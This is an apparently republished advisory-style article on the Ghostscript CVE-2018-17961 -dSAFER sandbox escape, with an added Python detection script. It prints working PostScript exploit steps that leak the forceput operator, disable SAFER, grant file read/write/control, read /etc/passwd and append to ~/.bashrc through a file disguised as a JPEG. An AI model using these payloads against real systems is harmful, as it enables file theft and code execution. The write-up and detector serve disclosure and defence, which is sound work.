
What is the Ghostscript -dSAFER sandbox escape technique based on vulnerability CVE-2018-17961?

2025-01-23 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article explains in detail how the Ghostscript -dSAFER sandbox escape technique based on vulnerability CVE-2018-17961 works. The content is of high quality, so the editor shares it here for reference, and hopes you will gain some understanding of the relevant knowledge after reading it.

Preface

What I am going to analyze for you today is a new Ghostscript -dSAFER sandbox escape technique, which still applies to every Ghostscript version currently in use. I don't know how long this flaw has existed, but I think it has been a long time.

The exploit file shown below works on the latest versions: when it is opened in evince, ImageMagick, GIMP or okular it appends a line to ~/.bashrc. Because nautilus calls evince-thumbnailer automatically, without any user interaction, simply browsing to the file is enough to trigger the vulnerability.

taviso@ubuntu:~$ convert exploit.jpg output.jpg
taviso@ubuntu:~$ tail -1 ~/.bashrc
echo pwned by postscript

Background

One of the core access-control features of PostScript is that executable procedures can be marked so that user code cannot inspect the implementation of system procedures that run with higher privileges. To demonstrate the problem I put together a complete exploit; interested readers can download it for testing [download address].

When you install an error handler in errordict and an operator fails, the failing operator is passed to the error handler. In this way errordict bypassed the -dSAFER sandbox; that was vulnerability CVE-2018-17183, which the technique in this article builds on.

Exploit details

It is important to note that this vulnerability was not fully fixed: you can still cause the error handler to be invoked by triggering an error, or reach the operator that was saved in the interpreter's internal state.

One way to exploit the vulnerability is to find a procedure whose execution can be interrupted: trigger an error, then interrupt the error handler itself while it runs (this can be done with /stackoverflow or /execoverflow). When that happens the operand stack is left in an inconsistent state, because Ghostscript tried to set up the error handler but that setup never completed.

Vulnerability exploitation mode

First, fill the stack with junk data, leaving only a small amount of room for the error handler:

GS> 0 1 300368 {} for

Then make /switch_to_normal_marking_ops fail by redefining pdfopdict as something that is not a dictionary:

GS> /pdfopdict null def

Call /switch_to_normal_marking_ops (inside a stopped context):

GS> GS_PDF_ProcSet /switch_to_normal_marking_ops get stopped

The procedure fails with /typecheck when it tries to write to pdfopdict:

GS> ==
true

Look at the last few elements of the stack that was saved:

GS> dup dup length 10 sub 10 getinterval ==
[300364 300365 300366 300367 300368 null /m {normal_m} --.forceput-- /typecheck]

As you can see, the error operator is sitting there, ready to be passed to the error handler.

forceput is a very powerful operator that ignores all access controls; now that it has been leaked onto the stack we can pull it off and use it to do whatever we want:

systemdict /SAFER false forceput
systemdict /userparams get /PermitFileControl [(*)] forceput
systemdict /userparams get /PermitFileWriting [(*)] forceput
systemdict /userparams get /PermitFileReading [(*)] forceput
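As an added example from the defender's side (not code from the original article or from Ghostscript), the following Python triage check flags the delivery described above: a file with an image extension whose content is actually PostScript, and the operators of the escape chain the article walks through. The indicator list, file names and sample contents are assumptions constructed here for illustration.

```python
# Added example (not from the original article): a small triage check for the
# disguised-PostScript delivery described above. ImageMagick and the evince
# thumbnailer pick the decoder from file content, not the extension, so a file
# called exploit.jpg that begins with a PostScript header is still handed to
# Ghostscript. The indicator list is assembled from the operators the article
# walks through; the sample files below are constructed for the test.
import re

# PS/EPS text header and the DOS EPS binary header.
POSTSCRIPT_MAGIC = (b"%!", b"\xc5\xd0\xd3\xc6")

# Tokens from the escape chain in the article (byte regexes over the raw file).
INDICATORS = {
    "forceput": rb"\bforceput\b",
    "safer_disabled": rb"/SAFER\s+false",
    "permit_file": rb"/PermitFile(Control|Writing|Reading)\b",
    "errordict": rb"\berrordict\b",
    "pdf_procset": rb"GS_PDF_ProcSet|switch_to_normal_marking_ops",
    "overflow_trigger": rb"/(stack|exec)overflow\b",
}

IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")


def looks_like_postscript(data: bytes) -> bool:
    """True if the header is one that Ghostscript-backed decoders accept as PostScript/EPS."""
    head = data.lstrip(b"\r\n\t ")[:4]
    return any(head.startswith(magic) for magic in POSTSCRIPT_MAGIC)


def triage(filename: str, data: bytes) -> dict:
    """Findings for one file: disguised-PostScript mismatch plus the escape indicators present."""
    is_ps = looks_like_postscript(data)
    disguised = is_ps and filename.lower().endswith(IMAGE_EXTENSIONS)
    hits = sorted(name for name, pat in INDICATORS.items() if re.search(pat, data))
    # errordict alone is common in benign files; alert only on the disguise or on
    # a privileged-operator / sandbox-setting hit.
    privileged = {"forceput", "safer_disabled", "permit_file"} & set(hits)
    return {"postscript": is_ps, "disguised": disguised,
            "indicators": hits, "alert": disguised or bool(privileged)}


# Constructed samples (not real malware): a PostScript file disguised as a JPEG
# that disables the sandbox as in the article, and a genuine JPEG header.
SAMPLE_DISGUISED = b"%!PS-Adobe-3.0\n/pdfopdict null def\nsystemdict /SAFER false forceput\n"
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"

if __name__ == "__main__":
    for name, blob in (("exploit.jpg", SAMPLE_DISGUISED), ("photo.jpg", SAMPLE_JPEG)):
        print(name, triage(name, blob))
```

The check only triages; the corresponding mitigation is to stop image tools from handing untrusted files to Ghostscript at all, for example by denying the PS, EPS and PDF coders in ImageMagick's policy.xml.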

Putting the above together, let's look at how to read /etc/passwd. Here is the demo:

$ gs -dSAFER -f test.ps
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
(root:x:0:0:root:/root:/bin/bash)

That is how the -dSAFER sandbox escape technique based on vulnerability CVE-2018-17961 works. I hope the above content is helpful to everyone and teaches something new. If you think the article is good, feel free to share it so more people can see it.
